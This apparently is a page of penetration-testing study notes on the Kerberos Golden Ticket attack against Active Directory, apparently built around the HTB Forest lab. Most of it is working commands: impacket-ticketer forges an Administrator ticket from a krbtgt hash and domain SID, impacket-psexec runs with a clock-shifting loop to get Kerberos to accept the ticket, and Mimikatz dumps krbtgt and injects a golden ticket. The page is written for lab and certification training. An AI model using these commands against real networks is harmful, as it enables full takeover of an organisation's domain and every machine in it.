Golden Ticket Attack

Overview

When we compromise the krbtgt account, we will own the domain and be able to grant tickets however we want to. This allows us complete access to every machine in the domain.

We can use Mimikatz on the Domain Controller to pull this attack off

Golden Ticket Attack via Ticketer

First get domain sid (inside of DC shell)

Get-ADDomain PNPT.local

impacket-ticketer -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> <user_name>

impacket-ticketer -nthash '819af826bb148e603acb0f33d17632f8' -domain-sid S-1-5-21-3072663084-364016917-1341370565 -domain htb.local Administrator

export KRB5CCNAME=administrator.ccache

Add the domain, hostnames etc to /etc/hosts file

impacket-psexec htb.local/administrator@forest -k -no-pass

You might have to change time for Kerberos to accept it

sudo for i in $(seq 00 24); do sudo date -s $i:36:00; impacket-psexec htb.local/threebigguys@10.10.10.161 -k -no-pass; done

sudo date -s 21:36:00

Resource

Golden Ticket Attack via Mimikatz

In the Domain Controller shell

mimikatz.exe
privilege::debug                
sekurlsa::lsa /inject /name:krbtgt

kerberos::golden /user:Administrator /domain:PNPT.local /sid:5-1-5-21--XXX /krbtgt:11f843XXX /id:500 /ptt

misc::cmd                 
psexec \\DESKTOP-ILG11 cmd.exe

PreviousDumping the NTDS.dit NextSAM Cleanup

Last updated 10 months ago

Was this helpful?